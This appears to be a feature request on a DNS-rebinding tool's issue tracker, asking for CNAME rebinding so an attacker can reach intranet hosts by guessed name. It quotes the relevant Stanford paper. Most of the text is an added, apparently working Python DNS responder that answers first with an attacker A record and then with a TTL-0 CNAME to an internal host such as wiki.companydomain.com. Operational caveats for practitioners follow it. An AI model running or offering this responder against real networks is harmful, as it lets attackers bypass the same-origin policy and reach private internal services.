Open
Description
Hello,
I was wondering if it would be possible to add support for rebinding a domain to a CNAME. That would allow an attacker to access some internal hosts without knowing the internal IP address, e.g. wiki.companydomain.com.
This technique is described in this paper:
https://crypto.stanford.edu/dns/dns-rebinding.pdf
Spidering the Intranet. The attacker need not specify the target machine by IP address. Instead, the attacker can guess the internal host name of the target, for example hr.corp.company.com, and rebind attacker.com to a CNAME record pointing to that host name. The client's own recursive DNS resolver will complete the resolution and return the IP address of the target. Intranet host names are often guessable and occasionally disclosed publicly [30, 9]. This technique obviates the need for the attacker to scan IP addresses to find an interesting target but does not work with the multiple A record technique described in Section 3.1.
serain
Labels: enhancement (New feature or request)
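The responder behaviour the issue asks for, as an added example that is not code from the original issue or from the project it was filed against: a minimal authoritative DNS server (standard library only) that answers the first query for the rebinding name with an A record for the attacker's host and every later query with a CNAME to a guessed intranet host name, both with TTL 0. The victim's recursive resolver then chases the CNAME itself and hands the intranet address back to the browser. The names and addresses (rebind.attacker.example, 203.0.113.10, wiki.companydomain.com) are constructed for the example.

```python
"""Minimal authoritative DNS responder that rebinds a name to a CNAME.

First query for REBIND_NAME: A record for the attacker host, TTL 0, so the
victim's browser loads the attacker's page. Every later query: CNAME to a
guessed intranet host name, TTL 0. The victim's own recursive resolver chases
the CNAME and returns the intranet IP, which the browser treats as the same
origin. Example code, not the project's own; names and IPs are constructed.
"""
import socket
import struct

ATTACKER_IP = "203.0.113.10"                # assumption: attacker-controlled host (TEST-NET-3)
REBIND_NAME = "rebind.attacker.example"     # assumption: name this responder is authoritative for
INTERNAL_TARGET = "wiki.companydomain.com"  # guessed intranet host name, as in the issue


def encode_name(name: str) -> bytes:
    """Encode a dotted host name as DNS labels (no compression)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, off: int):
    """Decode labels at off, following compression pointers. Returns (name, next_off)."""
    labels, jumped, end = [], False, off
    while True:
        ln = data[off]
        if ln & 0xC0 == 0xC0:                      # 2-byte compression pointer
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if ln == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(data[off:off + ln].decode("ascii"))
        off += ln


def build_query(txid: int, qname: str, qtype: int = 1) -> bytes:
    """Build a standard query with RD set, as a recursive resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


class RebindingResponder:
    """Per (client, name) state: first answer is the attacker A record, later ones the CNAME."""
    TTL = 0  # expire immediately so the next lookup comes back to us

    def __init__(self):
        self.seen = {}

    def respond(self, query: bytes, client_ip: str) -> bytes:
        txid, flags, _qd = struct.unpack("!HHH", query[:6])
        qname, off = decode_name(query, 12)
        qtype, _qclass = struct.unpack("!HH", query[off:off + 4])
        question = query[12:off + 4]
        rd = flags & 0x0100                        # echo the RD bit
        if qname.lower() != REBIND_NAME:
            # Not our name: authoritative NXDOMAIN (RCODE 3), no answers.
            return struct.pack("!HHHHHH", txid, 0x8400 | rd | 3, 1, 0, 0, 0) + question
        key = (client_ip, qname.lower())
        n = self.seen.get(key, 0)
        self.seen[key] = n + 1
        if n == 0:
            rtype, rdata = 1, bytes(int(o) for o in ATTACKER_IP.split("."))   # A
        else:
            rtype, rdata = 5, encode_name(INTERNAL_TARGET)                    # CNAME
        # 0xC00C is a compression pointer to the question name at offset 12.
        rr = b"\xC0\x0C" + struct.pack("!HHIH", rtype, 1, self.TTL, len(rdata)) + rdata
        return struct.pack("!HHHHHH", txid, 0x8400 | rd, 1, 1, 0, 0) + question + rr


def parse_answers(resp: bytes):
    """Return (rcode, [(name, type, ttl, rdata_text)]); decodes A and CNAME rdata."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", resp[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(resp, off)
        off += 4
    out = []
    for _ in range(an):
        name, off = decode_name(resp, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        if rtype == 1:
            text = ".".join(str(b) for b in resp[off:off + 4])
        elif rtype == 5:
            text, _ = decode_name(resp, off)
        else:
            text = resp[off:off + rdlen].hex()
        out.append((name, rtype, ttl, text))
        off += rdlen
    return flags & 0xF, out


def serve(port: int = 5353):
    """Serve the responder over UDP (port 53 needs privileges; 5353 for local testing)."""
    responder = RebindingResponder()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        data, addr = sock.recvfrom(512)
        sock.sendto(responder.respond(data, addr[0]), addr)


if __name__ == "__main__":
    serve()
```

Two caveats a practitioner will hit: the CNAME only helps if the victim's recursive resolver can actually resolve the intranet name (split-horizon or internal DNS), and, as the quoted paper notes, it cannot be combined with the multiple-A-record variant, since the resolver picks the final address rather than the browser.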